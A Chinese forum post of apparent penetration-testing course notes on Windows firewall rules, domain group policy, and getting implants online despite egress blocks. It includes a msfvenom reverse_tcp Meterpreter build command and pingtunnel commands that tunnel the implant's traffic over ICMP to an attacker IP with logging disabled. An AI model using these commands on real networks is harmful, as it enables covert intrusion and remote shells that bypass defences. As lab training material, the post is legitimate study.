论坛
潜水/灌水快乐,沉淀知识,认识更多同行。
ToB圈子
加入IT圈,遇到更多同好之人。
朋友圈
看朋友圈动态,了解ToB世界。
ToB门户
了解全球最新的ToB事件
博客
Blog
排行榜
Ranklist
文库
业界最专业的IT文库,上传资料也可以赚钱
下载
分享
Share
导读
Guide
相册
Album
记录
Doing
搜索
本版
文章
帖子
ToB圈子
用户
免费入驻
产品入驻
解决方案入驻
公司入驻
案例入驻
登录
·
注册
只需一步,快速开始
账号登录
立即注册
找回密码
用户名
Email
自动登录
找回密码
密码
登录
立即注册
首页
找靠谱产品
找解决方案
找靠谱公司
找案例
找对的人
专家智库
悬赏任务
圈子
SAAS
IT评测·应用市场-qidao123.com
»
论坛
›
物联网
›
物联网
›
第123天:内网安全-域防火墙&入站出站规则&不出网隧道上 ...
第123天:内网安全-域防火墙&入站出站规则&不出网隧道上线&组策略对象同步 ...
缠丝猫
论坛元老
|
2024-7-30 13:02:04
|
显示全部楼层
|
阅读模式
楼主
主题
1005
|
帖子
1005
|
积分
3015
马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。
您需要
登录
才可以下载或查看,没有账号?
立即注册
x
目次
案例一: 单机-防火墙-限制端口\协议出入站
案例二:不出网的办理思路
入站连接
隧道技术
案例三:域控-防火墙-组策略对象同步
案例四:域控-防火墙-组策略不出网上线
msf
cs
案例一: 单机-防火墙-限制端口\协议出入站
入站是指别人主动来连接/访问你
在一个单机系统当中只启动一个共用防火墙,剩下都关闭
启动网站服务,当这个启动的时候,curl访问网站失败
而当关闭入站连接的时候,网站又会重现显示,这是入站的时候被克制了
而出站是本身主动的去访问别人,windows防火墙出站默认是允许的
这里制作一个msf木马进行上传
msf开启监听
不设置规则的时候这个时候运行木马是可以进行连接的
设置一个出站限制
设置端口
设置规则
设置应用的防火墙范围
设置名称
这个时候运行没有任何反应
如许也只是禁用了一个端口,假如别人用的是4444端口,这里实验修改禁止所有端口出站
自然就无法连接msf了
案例二:不出网的办理思路
入站连接
出站被限制死了,但是入站没有,可以主动连接木马
接纳 windows/meterpreter/bind_tcp就是主动进行正向连接(入站)
天生正向连接的木马进行上传
设置模块,以及长途地址,运行木马,等待正向链接
隧道技术
限制了tcp协议,但是这些协议是向下兼容的,限制了tcp,也并非就限制了网络层以下类似icmp等协议
这里设置禁用所有tcp协议
去访问百度的时候会发现,浏览器无法访问,但是可以ping通
由于浏览器走的协议是http协议,而ping协议走的是icmp协议,所以隧道的思路就是把tcp协议利用icmp等等别的协议进行出网转发
案例三:域控-防火墙-组策略对象同步
在域控主机中打开组策略管理
找到域然后新建连接
配置该连接,右键点击配置
配置防火墙策略,域,专用,公用全部设置开启
域内主机,防火墙初始状态
更新组策略的命令
gpupdate/force
复制代码
现在主机状态
也可以接纳重启大概逼迫进行重置
配置禁止出网的规则
三个网络都配置,命名为no
实验更新
案例四:域控-防火墙-组策略不出网上线
两种情况
这里目前是有网络,但是tcp封杀第二种情况,用的隧道技术
msf
首先老师成一个msf木马,天生的时候把地址设置为127.0.0.1,反弹给本身的3333端口
msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=3333 -f exe -o msf.exe
复制代码
设置msf进行监听
这里需要把3333端口通过icmp协议转发到这个攻击主机的4444端口用到的项目地址
GitHub - esrrhs/pingtunnel: Pingtunnel is a tool that send TCP/UDP traffic over ICMP
下载这两个版本
linux传到攻击主机,windows传到被控主机
kali开启隧道用来接收别人通过icmp传给本身的,传过来将其又转换为tcp端口(sudo权限)
sudo ./pingtunnel -type server
复制代码
windows被控主机开启工具,将本身的3333端口监听发送给攻击主机的4444端口(需要管理员权限)noprint nolog是指不要输出日志
pingtunnel.exe -type client -l 127.0.0.1:3333 -s 192.168.172.132 -t 192.168.172.132:4444 -tcp 1 -noprint 1 -nolog 1
复制代码
这个时候再运行木马,成功上线
cs
设置反弹给本身的监听模块
利用这个监听器天生一个木马
再设置一个接收反弹信息的监听器
windows通过icmp反弹5555端口
kali开启隧道
运行木马,成功反弹shell
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
回复
使用道具
举报
0 个回复
倒序浏览
返回列表
快速回复
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
or
立即注册
本版积分规则
发表回复
回帖并转播
回帖后跳转到最后一页
发新帖
回复
缠丝猫
论坛元老
这个人很懒什么都没写!
楼主热帖
【设置ssh免密不起作用?彻底搞懂密钥 ...
关于Servlet的补充知识
kubernetes之镜像拉取策略ImagePullSec ...
【云原生】Docker 进阶 -- 构建自定义 ...
MySQL 8.0 新特性梳理汇总
java如何编写增强for循环呢? ...
基于C#+unity的2D跑酷闯关对战冒险游戏 ...
常见开发模型-敏捷开发与瀑布开发模型 ...
在chatGPT的帮助下成功从Rancher中删除 ...
超融合技术入门:怎样轻松把握这一技术 ...
标签云
AI
运维
CIO
存储
服务器
浏览过的版块
程序人生
Oracle
快速回复
返回顶部
返回列表